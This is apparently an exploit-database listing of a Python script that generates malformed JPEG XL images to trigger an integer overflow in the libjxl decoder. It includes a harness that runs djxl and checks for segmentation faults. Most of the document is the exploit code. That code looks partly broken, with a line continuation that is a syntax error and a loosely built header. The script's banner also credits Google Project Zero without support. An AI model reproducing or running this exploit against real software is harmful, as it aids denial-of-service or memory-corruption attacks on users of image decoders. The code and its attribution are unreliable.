Share
## https://sploitus.com/exploit?id=PACKETSTORM:217186
=============================================================================================================================================
    | # Title     : Libjxl Malicious Image Crafting Integer Overflow Generator                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://github.com/libjxl/libjxl/blob/main/lib/jxl/decode.cc                                                                |
    =============================================================================================================================================
    
    [+] Summary    : This Python script generates malicious JPEG XL (JXL) image files designed to test a potential Integer Overflow vulnerability in libjxl. 
                     The tool creates specially crafted JXL images with extremely large dimensions and manipulated headers that can trigger memory miscalculations when processed by vulnerable decoders.
    
    [+] The script produces two proof-of-concept files:
    
    poc32.jxl โ€“ targets 32-bit systems, using image dimensions (16384ร—16384) with RGBA float32 channels that theoretically require ~4 GB of memory, potentially causing integer overflow during allocation.
    
    poc64.jxl โ€“ targets 64-bit systems, using extremely large dimensions (2ยณยน ร— 2ยณโฐ pixels) to stress size calculations inside the decoder.
    
    The generator builds a simplified JXL structure containing:
    
    A valid JXL signature
    
    A jxlc codestream box with an intentionally oversized length
    
    A manipulated image header specifying excessive width, height, and channel configuration
    
    Random padding to simulate image data
    
    Additionally, the script includes a testing function that attempts to decode the generated file using the djxl tool from libjxl and checks for crashes such as SIGSEGV, which may indicate successful triggering of the vulnerability.
    
    			  
    [+] POC   : 
    
    
    #!/usr/bin/env python3
    
    import struct
    import sys
    import os
    
    def generate_poc_32bit(filename="poc32.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 32-bit systems.
        Dimensions: 16384ร—16384 RGBA float32 (4*4*16384*16384 = 4GB)
        """
        print(f"[*] Generating {filename} for 32-bit systems...")
    
        jxl_data = bytearray(b'\xff\x0a') 
    
        box_size = 0xFFFFFFFF 
        box_type = b'jxlc'     
        codestream = bytearray([
            0x00, 0x00, 0x00, 0x0C,  
            0x4A, 0x58, 0x4C, 0x20, 
            0x00, 0x40, 0x00, 0x40, 
            0x04, 0x04,             
            0x00, 0x00,             
    
        ] + bytearray(os.urandom(1024))) 
    
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', box_size))
            f.write(box_type)
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def generate_poc_64bit(filename="poc64.jxl"):
        """
        Generates a JXL image to exploit the vulnerability on 64-bit systems.
        Maximum dimensions: 2^31 ร— 2^30 pixels
        """
        print(f"[*] Generating {filename} for 64-bit systems...")
        
        width = 0x80000000  
        height = 0x40000000 
        
        jxl_data = bytearray(b'\xff\x0a')
        
    
        codestream = struct.pack('<II', width, height) + \
                     struct.pack('<BB', 4, 32) + \  
                     bytearray(os.urandom(2048))
        
        with open(filename, 'wb') as f:
            f.write(jxl_data)
            f.write(struct.pack('<I', 0xFFFFFFFF))
            f.write(b'jxlc')
            f.write(codestream)
        
        print(f"[+] Successfully generated {filename}")
        return filename
    
    def test_vulnerability(jxl_file, djxl_path="./djxl"):
        """
        Test the vulnerability on the target application.
        """
        import subprocess
        import time
        
        print(f"[*] Testing {jxl_file} on {djxl_path}...")
        
        try:
    
            start = time.time()
            result = subprocess.run([djxl_path, jxl_file, "--disable_output"], 
                                     capture_output=True, timeout=10)
            end = time.time()
            
            if result.returncode == -11:  
                print("[!] Vulnerability Confirmed: Segmentation Fault!")
                return True
            else:
                print(f"[-] Vulnerability not exploited: {result.returncode}")
                return False
                
        except subprocess.TimeoutExpired:
            print("[!] Application did not respond (maybe crash?)")
            return True
        except Exception as e:
            print(f"[!] Error: {e}")
            return False
    
    def main():
        print("="*60)
        print("JXL Integer Overflow PoC Generator")
        print("Google Project Zero - Vulnerability Report")
        print("="*60)
    
        poc32 = generate_poc_32bit()
        poc64 = generate_poc_64bit()
        
        print(f"\n[*] Created Files:")
        print(f"    - {poc32} (32-bit exploit)")
        print(f"    - {poc64} (64-bit exploit)")
        
        print(f"\n[*] To Test:")
        print(f"    $ ./build-i686/tools/djxl {poc32} --disable_output")
        print(f"    $ ./djxl {poc64} --disable_output")
        
    if __name__ == "__main__":
        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================